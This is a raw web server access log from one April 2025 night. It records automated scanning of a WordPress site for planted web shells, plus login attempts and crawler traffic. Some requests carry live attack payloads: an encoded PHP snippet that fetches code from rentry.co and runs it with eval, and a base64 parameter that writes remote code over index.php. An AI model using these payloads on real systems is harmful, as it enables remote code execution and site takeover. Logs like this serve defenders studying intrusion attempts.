194.238.24.238 - - [07/Apr/2025:21:44:13 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:21:44:13 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
162.240.162.123 - - [07/Apr/2025:21:46:02 -0300] "GET /.well-known/pki-validation/wp-admin/install.php HTTP/1.1" 404 - "-" "get_local:DCV"
173.208.236.138 - - [07/Apr/2025:21:49:37 -0300] "GET / HTTP/1.1" 200 330285 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [07/Apr/2025:21:49:38 -0300] "GET /000897866325406.html HTTP/1.1" 200 307181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.132.181.183 - - [07/Apr/2025:21:59:20 -0300] "GET /chosen.php?p= HTTP/1.1" 403 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:21:59:21 -0300] "GET /xx.php HTTP/1.1" 403 46924 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:21:59:41 -0300] "GET /xx.php HTTP/1.1" 403 301 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:21:59:43 -0300] "GET /wso.php HTTP/1.1" 403 46951 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:21:59:44 -0300] "GET /chosen.php?p= HTTP/1.1" 403 46951 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:00:19 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:00:20 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:00:20 -0300] "GET /wso.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:00:23 -0300] "GET /sample?pd=1&mapname=themes.php&a=vx000&dstr=%3C?php%20%20%20function%20get($url)%20%7B%20%20%20%20$ch%20=%20curl_init();%20%20%20%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20%20%20%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20%20%20%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20%20%20%20$data%20=%20curl_exec($ch);%20%20%20%20curl_close($ch);%20%20%20%20return%20$data;%7D$ok%20=%20'?%3E';%20%20%20%20%20%20eval(%22$ok%22%20.%20get('https://rentry.co/8uqon8hz/raw'));?%3E HTTP/1.1" 200 301 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:00:24 -0300] "GET /themes.php HTTP/1.1" 403 303 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:00:33 -0300] "GET /chosen.php?p= HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:01:05 -0300] "GET /wp-content/themes/tflow/up.php HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:01:16 -0300] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:01:26 -0300] "GET /class-db.php HTTP/1.1" 403 46951 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:01:27 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:01:45 -0300] "GET /wp-content/themes/tflow/up.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:01:56 -0300] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:02:36 -0300] "GET /chosen.php?p= HTTP/1.1" 403 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:03:05 -0300] "GET /sample?pd=1&mapname=themes.php&a=vx000&dstr=%3C?php%20%20%20function%20get($url)%20%7B%20%20%20%20$ch%20=%20curl_init();%20%20%20%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20%20%20%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20%20%20%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20%20%20%20$data%20=%20curl_exec($ch);%20%20%20%20curl_close($ch);%20%20%20%20return%20$data;%7D$ok%20=%20'?%3E';%20%20%20%20%20%20eval(%22$ok%22%20.%20get('https://rentry.co/8uqon8hz/raw'));?%3E HTTP/1.1" 200 305 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:03:06 -0300] "GET /themes.php HTTP/1.1" 403 303 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
82.165.125.50 - - [07/Apr/2025:22:03:48 -0300] "GET /style.php HTTP/1.1" 403 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:42 -0300] "HEAD /wordpress HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:43 -0300] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:43 -0300] "HEAD /wp HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:44 -0300] "HEAD /bc HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:45 -0300] "HEAD /bk HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:45 -0300] "HEAD /backup HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:45 -0300] "HEAD /old HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:46 -0300] "HEAD /new HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:46 -0300] "HEAD /main HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.177.149.166 - - [07/Apr/2025:22:05:47 -0300] "HEAD /home HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:07:05 -0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:07:23 -0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:09:46 -0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:09:53 -0300] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:11:16 -0300] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 200 46924 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:12:43 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:12:44 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:12:50 -0300] "GET /wp-content/plugins/WordPressCore/ HTTP/1.1" 200 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:16:12 -0300] "GET /atomlib.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:19:09 -0300] "GET /atomlib.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
52.179.121.67 - - [07/Apr/2025:22:21:25 -0300] "GET /erin1.PhP7 HTTP/1.1" 200 46923 "-" "-"
149.154.161.213 - - [07/Apr/2025:22:23:46 -0300] "GET /erin1.PhP7 HTTP/1.1" 200 46923 "-" "TelegramBot (like TwitterBot)"
120.34.65.56 - - [07/Apr/2025:22:28:44 -0300] "POST /wp-login.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
173.208.148.34 - - [07/Apr/2025:22:35:17 -0300] "GET /index.php?params=1 HTTP/1.1" 200 46924 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
154.205.6.229 - - [07/Apr/2025:22:38:27 -0300] "GET /lv.php HTTP/1.1" 403 46924 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
154.205.6.229 - - [07/Apr/2025:22:38:28 -0300] "POST /lv.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
154.205.6.229 - - [07/Apr/2025:22:38:30 -0300] "GET /delpaths.php HTTP/1.1" 403 46924 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
173.208.236.138 - - [07/Apr/2025:22:39:49 -0300] "GET / HTTP/1.1" 200 213484 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [07/Apr/2025:22:40:52 -0300] "GET / HTTP/1.1" 200 326647 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.208.236.138 - - [07/Apr/2025:22:40:53 -0300] "GET /000897866325406.html HTTP/1.1" 200 307375 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.132.181.183 - - [07/Apr/2025:22:44:21 -0300] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:44:35 -0300] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:45:06 -0300] "GET /cong.php HTTP/1.1" 403 305 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:45:30 -0300] "GET /css/index.php HTTP/1.1" 200 46951 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:46:02 -0300] "GET /.tmb/mariju.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:46:11 -0300] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:46:15 -0300] "GET /.tmb/mariju.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:46:25 -0300] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 403 46923 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:48:29 -0300] "GET /cong.php HTTP/1.1" 403 303 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:48:47 -0300] "GET /css/index.php HTTP/1.1" 200 46924 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:51:32 -0300] "GET /class-db.php HTTP/1.1" 403 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:51:33 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46923 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:52:46 -0300] "GET /wp-content/item.php HTTP/1.1" 200 381 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:53:58 -0300] "GET /wp-content/item.php HTTP/1.1" 200 381 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:57:20 -0300] "GET /class-db.php HTTP/1.1" 403 46951 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
194.238.24.238 - - [07/Apr/2025:22:57:21 -0300] "GET /wp-content/plugins/core/include.php HTTP/1.1" 200 46951 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:57:45 -0300] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 403 305 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:57:47 -0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 200 303 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:57:56 -0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/smoothness.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 200 297 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:57:58 -0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/index.php HTTP/1.1" 200 46923 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:58:06 -0300] "GET /wp-includes/Requests/Exception/HTTP/HTTP.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 200 303 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:22:58:09 -0300] "GET /wp-includes/Requests/Exception/HTTP/index.php HTTP/1.1" 200 46923 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:00:49 -0300] "GET /wp-login.php HTTP/1.1" 200 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:00:59 -0300] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 403 297 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:00 -0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 200 46954 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:01 -0300] "GET /epinyins.php HTTP/1.1" 403 46924 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:08 -0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/smoothness.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 200 297 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:09 -0300] "GET /wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/index.php HTTP/1.1" 200 293 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:13 -0300] "GET /wp-includes/Requests/Exception/HTTP/HTTP.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= HTTP/1.1" 200 305 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:14 -0300] "GET /wp-includes/Requests/Exception/HTTP/index.php HTTP/1.1" 200 299 "www.google.comhttps://t.me/optimasprimetools" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
103.132.181.183 - - [07/Apr/2025:23:01:23 -0300] "GET /wp-seo.php HTTP/1.1" 403 299 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
